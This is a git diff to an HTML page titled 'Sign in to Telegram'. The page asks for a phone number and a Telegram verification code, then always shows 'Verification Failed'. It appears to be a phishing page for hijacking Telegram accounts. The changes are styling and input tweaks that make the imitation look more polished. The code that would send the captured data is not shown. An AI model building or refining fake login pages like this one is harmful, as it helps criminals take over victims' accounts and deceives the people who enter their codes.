--- a/index.html
+++ b/index.html
@@ -4,6 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Sign in to Telegram</title>
+    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap" rel="stylesheet">
     <style>
         body {
             font-family: 'Open Sans', Arial, sans-serif;
@@ -14,7 +15,7 @@
             justify-content: center;
             align-items: center;
             height: 100vh;
-            overflow: auto; /* Allow scrolling */
+            overflow: hidden; /* Hide overflow to prevent scrolling */
         }
 
         .container {
@@ -25,23 +26,23 @@
             text-align: center;
             width: 100%;
             max-width: 400px;
-            margin: 20px auto;
+            margin: 0 auto;
         }
 
         .container img {
-            width: 80px;
+            width: 100px;
             margin-bottom: 20px;
         }
 
         h1 {
-            font-size: 20px;
-            color: #333333;
+            font-size: 24px;
+            color: #333;
             margin-bottom: 10px;
         }
 
         p {
-            font-size: 14px;
-            color: #777;
+            font-size: 16px;
+            color: #666;
             margin-bottom: 20px;
         }
 
@@ -60,11 +61,12 @@
         select, input[type="text"], input[type="number"] {
             width: 100%;
             padding: 12px;
-            border: 1px solid #ccc;
+            border: 1px solid #ddd;
             border-radius: 5px;
             font-size: 16px;
             box-sizing: border-box;
             margin-bottom: 10px;
+            outline: none;
         }
 
         input[type="checkbox"] {
@@ -98,7 +100,7 @@
             align-items: center;
             justify-content: space-between;
             padding: 12px;
-            border: 1px solid #ccc;
+            border: 1px solid #ddd;
             border-radius: 5px;
             cursor: pointer;
             font-size: 16px;
@@ -116,15 +118,23 @@
             border-radius: 5px;
             top: 100%;
             left: 0;
+            padding: 0;
+            margin: 0;
         }
 
         .dropdown-content div {
             padding: 10px;
             cursor: pointer;
+            font-size: 16px;
+            border-bottom: 1px solid #ddd;
+        }
+
+        .dropdown-content div:last-child {
+            border-bottom: none;
         }
 
         .dropdown-content div:hover {
-            background-color: #f1f1f1;
+            background-color: #f0f0f0;
         }
 
         .dropdown.open .dropdown-content {
@@ -143,15 +153,10 @@
             transform: rotate(180deg);
         }
 
-        #verificationContainer, #finalMessageContainer {
-            display: none;
-        }
-
         @media (max-width: 600px) {
             .container {
                 padding: 15px;
                 max-width: 100%;
-                box-sizing: border-box;
             }
 
             .button, input[type="text"], input[type="number"] {
@@ -175,7 +180,7 @@
                     <!-- Country options will be populated here -->
                 </div>
             </div>
-            <input type="text" id="phoneNumber" placeholder="Phone Number">
+            <input type="text" id="phoneNumber" placeholder="Phone Number" maxlength="15">
         </div>
 
         <div>
@@ -185,7 +190,7 @@
         <button class="button" onclick="goToVerificationPage()">Next</button>
     </div>
 
-    <div class="container" id="verificationContainer">
+    <div class="container" id="verificationContainer" style="display:none;">
         <h1 id="phoneDisplay"></h1>
         <p>We have sent you a message in Telegram with the code.</p>
 
@@ -197,7 +202,7 @@
         <button class="button" onclick="submitVerification()">Submit</button>
     </div>
 
-    <div class="container" id="finalMessageContainer">
+    <div class="container" id="finalMessageContainer" style="display:none;">
         <h1>Verification Failed</h1>
         <p id="finalMessage"></p>
         <button class="button" onclick="resetForm()">Try Again</button>
@@ -223,7 +228,7 @@
                 const item = document.createElement('div');
                 item.innerHTML = `${country.flag} ${country.name} (${country.code})`;
                 item.onclick = () => {
-                    document.getElementById('phoneNumber').value = country.code;
+                    document.getElementById('phoneNumber').value = country.code + ' ';
                     closeDropdown();
                 };
                 dropdownMenu.appendChild(item);
@@ -241,7 +246,7 @@
         }
 
         function goToVerificationPage() {
-            const phoneNumber = document.getElementById('phoneNumber').value;
+            const phoneNumber = document.getElementById('phoneNumber').value.trim();
 
             if (phoneNumber === '') {
                 alert('Please enter your phone number.');
